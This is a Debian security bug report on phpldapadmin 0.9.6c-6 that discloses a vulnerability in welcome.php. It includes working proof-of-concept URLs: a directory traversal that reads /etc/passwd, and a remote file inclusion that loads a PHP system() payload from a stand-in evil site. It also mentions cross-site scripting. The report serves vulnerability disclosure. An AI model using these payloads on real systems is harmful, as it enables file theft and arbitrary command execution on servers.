Package: phpldapadmin Version: 0.9.6c-6 Severity: critical Tags: security Justification: root security hole
if unpatched and vulnerable, a user can see any file on target system, poc: http://[target]/[path]/phpldapadmin/welcome.php?custom_welcome_page=../../../../../../../../etc/passwd a user can also execute arbitrary php code and system commands: http://[target][path]/phpldapadmin/welcome.php?custom_welcome_page=http://[evil_site]/cmd.gif where cmd.gif is a file like this: <?php system('[some_command]); ?> also a user can craft a malicious url to include malicious client side code that will be executed in the security contest of the victim browser original advisory: http://www.rgod.altervista.org/phpldap.html -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]